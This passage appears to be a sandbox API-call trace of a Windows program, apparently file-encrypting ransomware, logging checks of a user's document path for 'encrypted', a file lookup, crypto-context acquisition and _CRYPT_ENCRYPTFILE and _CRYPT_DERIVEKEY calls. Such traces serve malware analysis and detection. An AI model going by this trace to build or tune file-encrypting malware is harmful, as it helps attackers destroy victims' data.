lpString2="encrypted", cchCount2=9) returned 1 [0035.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.696] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.696] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.696] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.696] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.696] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.696] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.696] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.696] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.696] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mAiAINSrD\\007meSo66\\jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.696] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AiAINSrD\\007meSo66\\jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.696] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iAINSrD\\007meSo66\\jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.696] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AINSrD\\007meSo66\\jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.696] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INSrD\\007meSo66\\jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.696] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NSrD\\007meSo66\\jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.696] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SrD\\007meSo66\\jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.696] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rD\\007meSo66\\jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.696] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D\\007meSo66\\jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.696] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\007meSo66\\jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.696] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="007meSo66\\jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.696] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="07meSo66\\jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.696] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7meSo66\\jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.696] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="meSo66\\jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.696] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eSo66\\jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.696] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="So66\\jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.696] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o66\\jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.696] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="66\\jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.696] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6\\jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.696] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.696] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.696] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.696] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HG4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.696] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="G4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.697] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.697] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BBW8X\\Ol52nfGJKPYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.697] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BW8X\\Ol52nfGJKPYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.697] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="W8X\\Ol52nfGJKPYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.697] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8X\\Ol52nfGJKPYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.697] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X\\Ol52nfGJKPYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.697] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Ol52nfGJKPYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.697] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ol52nfGJKPYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.697] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l52nfGJKPYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.697] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="52nfGJKPYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.697] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2nfGJKPYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.697] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nfGJKPYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.697] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fGJKPYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.697] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJKPYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.697] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JKPYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.697] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KPYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.697] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PYhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.697] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YhFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.697] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hFqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.697] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FqmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.697] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qmJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.697] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mJCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.697] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JCtG.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.697] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.697] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0035.697] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0035.697] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0035.697] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.697] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.697] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ots", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.698] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ots", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0035.698] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0035.698] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0035.698] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0035.698] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0035.698] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.698] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x573040a0, ftCreationTime.dwHighDateTime=0x1d5b5f6, ftLastAccessTime.dwLowDateTime=0xcc4266d0, ftLastAccessTime.dwHighDateTime=0x1d5c388, ftLastWriteTime.dwLowDateTime=0xcc4266d0, ftLastWriteTime.dwHighDateTime=0x1d5c388, nFileSizeHigh=0x0, nFileSizeLow=0x16907, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="Ol52nfGJKPYhFqmJCtG.ots", cAlternateFileName="OL52NF~1.OTS")) returned 0x7c2100 [0035.698] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0035.698] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.698] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0035.698] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.698] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0035.698] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0035.698] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.698] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0035.698] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.699] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.699] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0035.699] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0035.699] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0035.699] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.699] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.699] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.699] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0035.699] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.700] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5b30) returned 1 [0035.700] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.700] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.700] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0035.701] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0035.701] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0035.701] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.715] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.715] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.715] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0035.715] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0035.715] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0035.715] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.715] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.715] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.715] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.715] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0035.716] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.716] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.716] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0035.716] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.716] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0035.716] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0035.716] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.716] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.716] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0035.716] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0035.716] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0035.716] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.716] PeekMessageW 